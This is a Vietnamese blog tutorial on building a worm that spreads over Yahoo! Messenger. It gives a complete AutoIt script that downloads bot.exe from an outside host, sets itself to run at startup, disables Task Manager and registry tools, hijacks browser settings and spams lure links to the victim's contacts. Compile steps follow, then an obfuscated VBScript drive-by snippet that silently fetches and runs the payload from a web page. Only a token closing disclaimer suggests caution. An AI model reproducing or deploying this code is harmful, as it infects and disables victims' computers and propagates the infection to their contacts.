Cách làm virus lan tràn qua Y!M
Link gốc: http://dailongonline.wordpress.com/category/hacker/
Trước tiên save đọan code này vào notepad dưới dạng *.txt (vd: bot.txt).Bạn sửa lại theo ý thích nha
If Not FileExists(@WindowsDir & “\taskmsg.exe”) Then
InetGet (”http://phidao.net/yahoo/bot.exe”, @WindowsDir & “\taskmsg.exe”, 0, 1)
Sleep(5000)
EndIf
RegWrite(”HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel”, “Homepage”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System”, “DisableTaskMgr”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System”, “DisableRegistryTools”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main”, “Start Page”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz”, “content url”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast”, “content url”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run”, “Task Manager”, “REG_SZ”, @WindowsDir & “\taskmsg.exe”)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main”, “Window Title”, “REG_SZ”, “Minhnhut.be :: Another Version of Nhut.be :: Chut gi de nho…”)
$tin[0] = “Vui gi ma vui the! Dau ca bung roi ne… http://phidao.net/yahoo/ “
$tin[1] = “Trui, ngo nghinh qua a… Vo coi thu nao http://phidao.net/yahoo/ “
$tin[2] = “Vui kinh khung! Ghe qua day ti xiu nha ban http://phidao.net/yahoo/ “
$tin[3] = “Chao mung cac ban den voi Dao Khuc Community http://phidao.net/yahoo/ “
$tin[4] = “Moi phat hien ra cai nay ne, cuc hay luon nha http://phidao.net/yahoo/ “
$tin[5] = “Kinh di qua di mat… Toan la ma trong nay ne http://phidao.net/yahoo/ “
$tin[6] = “Gom gi ma gom the… Vao day ma xem gom co nao http://phidao.net/yahoo/ “
$tin[7] = “Cai gi the nhi? Thang ban moi quang cao cai nay http://phidao.net/yahoo/ “
$tin[8] = “Troi oi!Album hinh moi lam dep ghe==> http://phidao.net/yahoo/ “
$tin[9] = “Hey! Coi Album hinh moi lam ne http://phidao.net/yahoo/ “
While (1)
sleep(60000)
$tieude = WinGetTitle(”Yahoo! Messenger”, “”)
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send(”^m”)
Send(”{DOWN}”)
Send(”^{SHIFTDOWN}{END}{SHIFTUP}”)
Send(”{ENTER}”)
Send(”^v {ENTER}”)
BlockInput (0)
EndIf
Sleep(1800000)
WEnd
Sau khi cài đặt xong mở chương trình “Compile Script to.exe”
Ở fần Source (AutoIT .au3 file): chọn đường dẫn tới file bot.txt vừa tạo
Custom Icon (.ico): tạo icon cho chương trình, ko có cũng ko sao
Đánh vào dấu kiểm Allow decompilation
Passphrase: đánh password tùy thích vào
Verify Passphrase: đánh lại password
Nhấn nút convert là xong.
****
Tiếp theo đính đọan code này vào web để chạy file bot.exe
<script language=“VBScript”>
on error resume next
dl = “http:/phidao.net/yahoo/bot.exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,””)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>
Okie xong rùi đó test thử xem nào
———————————————-
đây là tool để tạo con này:Download Autoit 3.2.1tại đây
Bài viết với mục đích tham khảo mong các ban cẩn thận khi thức hành
